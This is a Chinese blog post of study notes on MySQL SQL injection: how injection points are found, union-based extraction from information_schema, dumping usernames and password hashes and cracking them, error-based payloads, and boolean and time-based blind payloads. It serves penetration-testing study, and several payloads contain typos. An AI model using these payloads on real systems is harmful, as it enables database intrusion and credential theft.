SQL注入原理及手法

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量100 收藏 1
点赞数
文章标签: 数据库 mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lenjing_/article/details/128954228
版权

SQL注入
漏洞原理:1.程序编写者处理程序和数据库交互的时候,使用字符串拼接的方式构造SQL
          2.未对用户可控参数进行足够的过滤就将参数内容拼接进SQL语句中
注入点可能的位置:GET数据、POST数据、HTTP头部、COOKIE数据等
注入手法:联合查询
                报错注入
                布尔盲注
                延时注入
                堆叠查询
MYsql元数据数据库:information_schema
mysql 常用的函数与参数:version()数据库版本/database()当前数据库/user()用户 /current_user()当前用户名/system_user()系统用户名/@@datadir数据库路径/@@version_compile_os操作系统版本/length(datebase())返回字符串长度/substring(字符串或者列名,起始位置,截取长度)截取字符串/substr()截取字符串/left(version(),2) 从左侧开始去指定字符个数的字符串、concat('a','b','c')没有分隔符的连接字符串/concat_ws('/','a','b','c')含有分隔符的连接字串/group_concat()连接一个组的字符串、ord('a')返回ASCII码、hex()字符转16进制、unhex()16进制转字符、floor(x)返回不大于X的最大整数、round()返回参数x接近的整数、rand()返回0-1之间的随机浮点数、load_file()读取文件,并返回文件内容最为一个字符串
注入过程:御剑扫描网站后台
@  判断SQL注入点
 ?id=34  +-1          select * from tbName where id = $id
 
@   ?id=35'    字符型还是数字型报错:near ''' at line 1  
select * from tbName where id = 35'
 
@   测试页面是否有布尔类型的状态
?id=35 and 1=1
?id=35 and 1=2
select * from tbName where id=35 and 1=1
select * from tbName where id=35 and 1=2
 
@   ?id=35 and sleep(4)      是否有延时
第一种:联合查询
使用[order by] 语句来判断当前select 语句所查询的虚拟列表的列数
得到字段个数之后,可以尝试构造联合查询语句
[?id=33 union select 1,2,3,4,5,6,7,8,9,10--+]
页面显示的是第一张虚拟表的内容,那么我们可以考虑让第一张虚拟表的查询条件为假,则显示第二条记录。因此构造SQL,语句:
[?id=33 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,--+]
[?id=-33 1=2 union select 1,2,3,4,5,6,7,8,9,10,--+]
先通过database()获取当前数据库名
再查数据库中的表
我们可以通过查询information_schema.tables 来获取当前数据库的数据表
hex(group_concat(table_name))...from information_schema.tables where tables_schema=database()
再查数据库中的字段名
hex(group_concat(cloumns_name))...from information_schema.cloumns where
tables_schema=database() and table_name='cms_users'
得到结果
… hex(concat(username,':',password)) … from cms_users
MD5在线查询
第二种:报错注入
在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以进行报错注入
group by 重复键冲突
.....and(select 1 from(select count(*),concat(select version() from information_schema.tables limit 0,1),floor(rand()*2) as x from information_schema.tables group by x)a)
XPATH报错
@ extractvalue()
[… and extractvalue(1,count('^',(select version()),'^'))--+]
@ updatexml()
[… and updatexml(1,count('^',(select version()),'^'))--+]
第三种:布尔盲注
原理
利用页面返回的布尔类型状态,正常或者不正常
猜数据库名长度:and length(database())=1..2...3
确定之后截取数据库名的字母 and ord(substr(database(),1,1))=99..
第四种:延时注入
@ 获取数据库名长度
[.. and if((length(database())=3),sleep(5),1)--+]
 
@ 数据库名第二位
[.. and if((ascii(substr(database(),2,1)=109),sleep(5),1)]
--------
口诀
是否有回显           联合查询
是否有报错           报错注入
是否有布尔类型状态   布尔盲注
绝招                 延时注入
--------

指间西瓜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入天书
03-31
SQL注入手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析...第一节、SQL注入原理 第二节、判断能否进行SQL注入 第三节、判断数据库类型及注入方法 SQL注入的一般步骤 .....
SQL注入类型与技巧
求大佬师傅带
09-01 3564
SQL注入类型与技巧
【超详细版】学习SQL注入看这篇就够了(原理及思路绕过)
MachineGunJoe666
04-27 4013
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 3271
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
安全学习笔记——sql注入原理
XiaoXiao_RenHe的专栏
01-07 302
sql注入原理解析
SQL注入基础原理与案例(详细总结)
剁椒鱼头没剁椒的博客
10-20 6367
本篇总结了学习SQL注入的笔记,暂时没总结WAF绕过方面的内容,后期会对WAF绕过进行总结。目前先总结一些基础的东西,可能有些参数不全,具体的参数或者函数可以百度搜索一下。发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
SQL注入方法讲义
07-20
SQL 注入原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取你想到得到的资料。例如,在一个网站的搜索页面中,攻击者可以构造特殊的搜索语句,例如添加单引号、括号等特殊字符,以欺骗服务器...
CTF中几种通用的sql盲注手法注入的一些tips1
08-03
2、使场景 2、使场景 2、原理分析 3、使场景 2、regexp 盲注是来实验吧道注题 3、union 盲注利起来较简单,就是利上说的那些条件进注,例是来蓝鲸
基于Kali Linux的SQL注入微信后台测试研究.pdf
09-06
然后,报告介绍了SQL注入的概念和原理SQL注入是一种常见的网络攻击手法,攻击者可以通过.inject恶意SQL语句来攻击数据库,获取敏感信息或控制系统。报告还介绍了渗透测试中的SQL注入方法,通过使用工具如...
SQL代码注入详解和防范技巧
08-04
详细讲述了sql注入原理和各种注入手法 并具体讲述了如何防范sql注入的方法
Sql注入详解(原理篇)
Naive的博客
09-11 7676
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入原理及思路(绕过)-超详细
weixin_52501704的博客
05-17 2926
(1)user() 返回当前使用数据库的用户,也就是网站配置文件中连接数据库的账号 (2)version() 返回当前数据库的版本 (3)database() 返回当前使用的数据库,只有在use命令选择一个数据库之后,才能查到 (4)group_concat() 把数据库中的某列数据或某几列数据合并为一个字符串 (5)@@datadir 数据库路径 (6)@@version_compile_os 操作系统版本。通过+1、-1、and 1=1、and 1=2、注释符。或者通过报错注入是网页返回报错信息。
SQL注入详解(万字文章详解)
追光者的博客
03-12 7864
本文章仅为学习交流使用,请勿做其它用途使用,请勿触碰法律红线。
【超详细版】SQL注入原理及思路绕过(看这篇就够了)
fly_enum的博客
12-30 8563
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
SQL注入经验方法总结
太阳照耀我走四方
07-02 1363
SQL注入经验方法总结
关于SQL注入的一些技巧分享
weixin_49071459的博客
12-29 221
先上一道简单的ctf注入题: 一道利用order by进行注入的ctf题 很不错的一道利用order by的注入题,之前不知道order by除了爆字段还有这种操作。 原题地址:http://chall.tasteless.eu/level1/index.php?dir= 直接进去dir后的参数是ASC,网页上有从1~10编号的10条信息。绕了一大圈反应出是order by后...
常见SQL注入手法总结与技巧(一)
sechelper的博客
02-11 1230
SQL注入产生本质,盲注基本原理的详解与技巧,union联合注入演示
SQL注入详解
热门推荐
行者AI
09-16 1万+
现在大多数系统都使用B/S架构,出于安全考虑需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往会出现安全隐患,为了更好的保护数据泄露或服务器安全,为了方便的安全测试,便编写此文。 1. SQL注入简介 SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。下面以PHP语句为例作为展示: query="SE
sql注入原理及防范原理
06-07
SQL注入原理是攻击者在用户提交数据时,将恶意的SQL语句注入到应用程序中,从而导致应用程序对数据库的非法操作。攻击者可以通过SQL注入攻击获取数据库中的敏感信息、修改、删除或添加数据等。 防范SQL注入攻击的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值